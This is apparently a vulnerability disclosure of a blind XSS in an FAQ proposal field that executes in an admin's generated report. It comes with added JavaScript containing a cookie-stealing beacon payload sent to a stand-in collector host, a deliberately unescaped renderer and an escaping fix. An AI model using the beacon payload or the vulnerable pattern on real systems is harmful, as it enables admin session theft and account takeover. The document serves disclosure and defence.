Hello.
Vulnerability: Blind XSS in Admin Panel while generating Report
- Without being logged in to the application
- Go to FAQ-Proposal -> put an XSS payload like <script>alert('1')</script> in the question field
- Send the proposal
- Admin will log in
- The proposal will show up in the category you selected while sending it (here category number 1)
- Admin will go to Statistics and then Reports
- Generate Report
- Blind XSS will be fired in the Admin Panel: the stored question text is rendered unescaped into the generated report and the script executes in the admin's browser
Impact: because the payload runs inside the admin's browser session it can steal the admin cookies (any that are not flagged HttpOnly) and be used for a full account takeover of the admin account.
Best regards
Ahmed Hassan
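Added example, not part of the original report and not the application's own code. It shows the two sides of the finding above: the kind of payload a tester submits for a blind XSS, where the alert('1') in the admin-only report cannot be observed and the script must instead beacon back to a tester-controlled collector, and the rendering-side fix, which HTML-escapes the untrusted question field before it is concatenated into the report. The collector URL and the report row template are assumptions; the sample proposal is constructed and reuses the payload from the report.

```javascript
// Added example: blind XSS beacon payload and the escaping fix for the
// report renderer. COLLECTOR is a hypothetical, tester-controlled endpoint.
const COLLECTOR = "https://collector.example/hit";

// Builds the payload a tester would submit in the question field. Instead of
// alert(), which nobody sees when the report is only viewed by the admin, it
// sends the page URL and document.cookie to the collector via an image load.
// Cookies flagged HttpOnly are not readable from JS and will not be included.
function buildBlindXssPayload(collector) {
  const js =
    `new Image().src=${JSON.stringify(collector)}` +
    `+"?u="+encodeURIComponent(location.href)` +
    `+"&c="+encodeURIComponent(document.cookie)`;
  return `<script>${js}</script>`;
}

// Escaping for the HTML *text* context (between tags). Attribute values and
// inline JavaScript contexts need their own, different encoding.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable renderer (assumed shape of the report row): untrusted proposal
// fields are interpolated straight into the HTML of the generated report.
function renderReportRowVulnerable(proposal) {
  return `<tr><td>${proposal.category}</td><td>${proposal.question}</td></tr>`;
}

// Hardened renderer: every untrusted field is escaped for the text context,
// so the stored <script> tag becomes inert markup in the admin's report.
function renderReportRow(proposal) {
  return (
    `<tr><td>${escapeHtml(proposal.category)}</td>` +
    `<td>${escapeHtml(proposal.question)}</td></tr>`
  );
}

// Simple check used to compare the two renderers: does the fragment still
// contain a real, executable script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample proposal using the payload from the report above.
const sampleProposal = {
  category: "1",
  question: "<script>alert('1')</script>",
};

// Constructed sample with the beaconing payload a blind-XSS test would use.
const beaconProposal = {
  category: "1",
  question: buildBlindXssPayload(COLLECTOR),
};

// Renders both samples through both renderers and reports which ones would
// execute script in the admin's browser.
function compareRenderers() {
  return {
    vulnerableExecutes: containsScriptTag(renderReportRowVulnerable(sampleProposal)),
    hardenedExecutes: containsScriptTag(renderReportRow(sampleProposal)),
    vulnerableBeaconExecutes: containsScriptTag(renderReportRowVulnerable(beaconProposal)),
    hardenedBeaconExecutes: containsScriptTag(renderReportRow(beaconProposal)),
  };
}

console.log(compareRenderers());
```

Escaping at the point of output is the fix; stripping `<script>` on input is not enough because event-handler attributes and other tags reach the same sink. Two independent mitigations limit the impact the report claims even if escaping is missed somewhere: marking the admin session cookie HttpOnly keeps it out of `document.cookie`, and a Content-Security-Policy without `unsafe-inline` on the admin panel blocks the inline script from running at all.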